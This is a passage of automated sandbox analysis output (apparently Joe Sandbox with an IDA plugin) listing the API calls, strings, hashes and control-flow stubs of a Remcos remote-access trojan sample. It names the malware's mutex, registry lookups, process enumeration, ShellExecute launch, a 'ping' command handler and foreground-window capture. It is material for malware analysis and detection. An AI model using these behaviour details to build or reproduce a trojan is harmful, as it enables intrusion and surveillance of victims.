                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077ED
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407805
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040781D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040782F
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407841
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(0041580C,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407865
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407875
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407666
                                • Part of subcall function 00408E4E: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00405FB0,80000001,00000000), ref: 00408E64
                                • Part of subcall function 00408E4E: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,004157E8,?,00405FB0,80000001,00000000), ref: 00408E79
                                • Part of subcall function 00408E4E: RegCloseKey.ADVAPI32(00000000,?,00405FB0,80000001,00000000), ref: 00408E84
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040768E
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076A9
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076B5
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076C6
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076E2
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076FE
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040771A
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407736
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407752
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407768
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407893
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040789B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078A6
                                • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                                • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                • Part of subcall function 00402A78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041580C,?), ref: 00402AF7
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                                • Part of subcall function 00402A78: ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                                • Part of subcall function 00402A78: exit.MSVCRT ref: 00402B3D
                                • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                                • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078D3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004078DC
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004078E8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000001), ref: 004078FD
                                • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00410844), ref: 0040792A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00407945
                                • Part of subcall function 00407E0B: GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                                • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                                • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                                • Part of subcall function 00407E0B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                                • Part of subcall function 00407E0B: Process32First.KERNEL32(?,?), ref: 00407E79
                                • Part of subcall function 00407E0B: Process32Next.KERNEL32(?,00000128), ref: 00407E88
                                • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00407EA8
                                • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                                • Part of subcall function 00407E0B: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                                • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                                • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                                • Part of subcall function 00407E0B: Process32Next.KERNEL32(?,00000128), ref: 00407EFF
                                • Part of subcall function 00407E0B: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                                • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407969
                              • atoi.MSVCRT ref: 00407970
                              • CreateThread.KERNEL32(00000000,00000000,0040F8BF,00000000,00000000,00000000), ref: 0040799F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079AC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079C0
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000031,00410668,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079D5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000011,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079EC
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079FE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A17
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000031,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A30
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A42
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A5D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407A66
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407A72
                              • CreateDirectoryA.KERNEL32(00000000), ref: 00407A79
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415720,004108CC,00000000,00000011), ref: 00407A97
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000011), ref: 00407AA4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 00407AB0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AB9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AC2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AE0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AFB
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B16
                              • CreateThread.KERNEL32(00000000,00000000,0040E157,00000000,00000000,00000000), ref: 00407B2B
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000016,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B38
                              • CreateThread.KERNEL32(00000000,00000000,0040E157,00000001,00000000,00000000), ref: 00407B4E
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000023,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B5B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000026,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B71
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000000,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B83
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B9E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407BA7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407C44
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$?data@?$basic_string@$??1?$basic_string@?c_str@?$basic_string@$V01@@$??0?$basic_string@V01@$??4?$basic_string@$AddressProcV?$basic_string@$CreateD@1@@D@2@@0@Module$Handle$?length@?$basic_string@Thread$??8std@@Hstd@@$?size@?$basic_string@LibraryLoadOpenProcess32$?begin@?$basic_string@?find@?$basic_string@CloseFileMutexNameNextQueryV10@V12@Valuefreemalloc$??2@??9std@@?end@?$basic_string@?substr@?$basic_string@CurrentD@2@@0@0@DirectoryErrorExecuteFirstLastObjectProcessShellSingleSnapshotToolhelp32V10@0@V10@@WaitY?$basic_string@atoiexit
                              • String ID: (32 bit)$ (64 bit)$EXEpath$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$origmsc
                              • API String ID: 2029078087-2861766086
                              • Opcode ID: a7e76d1f5698b6cb19da30083dfc977b1b734f58d8449f27491d567c095a8673
                              • Instruction ID: 9e524ab3c3c25e5b5afb6edb3c87aefde3ed2a315a96d5f46ca7337cbf0df8a9
                              • Opcode Fuzzy Hash: a7e76d1f5698b6cb19da30083dfc977b1b734f58d8449f27491d567c095a8673
                              • Instruction Fuzzy Hash: 0C227370B05244ABDB0477B1AC5EAEE3B6A9B84305F0044BEF502FA2E1DEBC5D85875D

                              Control-flow Graph

                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6A3F5E04), ref: 0040F05A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F064
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F06D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                              • String ID:
                              • API String ID: 3435050692-0
                              • Opcode ID: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                              • Instruction ID: 05261c11a0c2935763cb9f53f66ce9cc739fdea45f744e86f2ec5e7b64bf2302
                              • Opcode Fuzzy Hash: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                              • Instruction Fuzzy Hash: 6F31997150014AABCB14EFA1ED9DCDE7B79EE54305B108079F406A31A0EF75AF4ACB68

                              Control-flow Graph

                              • Control-flow graph for the function at 0040FD88 (rendered graph omitted; legend: Executed / Not Executed; blocks call __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, GetStartupInfoA, GetModuleHandleA, exit, _XcptFilter)
                              APIs
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                              • String ID:
                              • API String ID: 801014965-0
                              • Opcode ID: 1092ec1c6f5248e51e2d757a765f21b697df3d527996ee472cc7716abd981555
                              • Instruction ID: 8e1b74afc4b48038761e77c4c7ed844e3b6dc848ee47d0f1d3c708b4ab1b3d45
                              • Opcode Fuzzy Hash: 1092ec1c6f5248e51e2d757a765f21b697df3d527996ee472cc7716abd981555
                              • Instruction Fuzzy Hash: 474185B1840708DFC730DFA4D845ADA7BB8FB49710F20413BF551A76A1D7785885CBA8

                              Control-flow Graph

                              • Control-flow graph for the function at 00408E97 (rendered graph omitted; legend: Executed / Not Executed; blocks call RegOpenKeyExA, RegQueryValueExA, RegCloseKey)
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00407538,00000000,00020019,00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC), ref: 00408EB6
                              • RegQueryValueExA.KERNELBASE(00407538,?,00000000,80000001,?,00000000,00000000,?,?,?,00407538,80000001,00000000), ref: 00408ED4
                              • RegCloseKey.KERNELBASE(00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC,00000000), ref: 00408EDF
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                              • Instruction ID: 3bc629e04baa43d7f680f8c54f18a859d153aa5dc69768ea16728ed6502bf047
                              • Opcode Fuzzy Hash: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                              • Instruction Fuzzy Hash: DFF01D76900218BFDF118F90ED05FDA7FB8EB08760F108166FA05EA150E7B1DA50EB94
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A737
                              • SetEvent.KERNEL32(?), ref: 0040A740
                              • CloseHandle.KERNEL32(?), ref: 0040A749
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040A75A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A766
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040A796
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,ping), ref: 0040A7AB
                              • GetTickCount.KERNEL32 ref: 0040A7BD
                                • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                • Part of subcall function 0040E898: GetLastInputInfo.USER32(00000000), ref: 0040E8A8
                                • Part of subcall function 0040E898: GetTickCount.KERNEL32 ref: 0040E8AE
                                • Part of subcall function 0040E85D: GetForegroundWindow.USER32 ref: 0040E866
                                • Part of subcall function 0040E85D: GetWindowTextW.USER32(00000000,?,00000200), ref: 0040E879
                                • Part of subcall function 0040E85D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040E88D
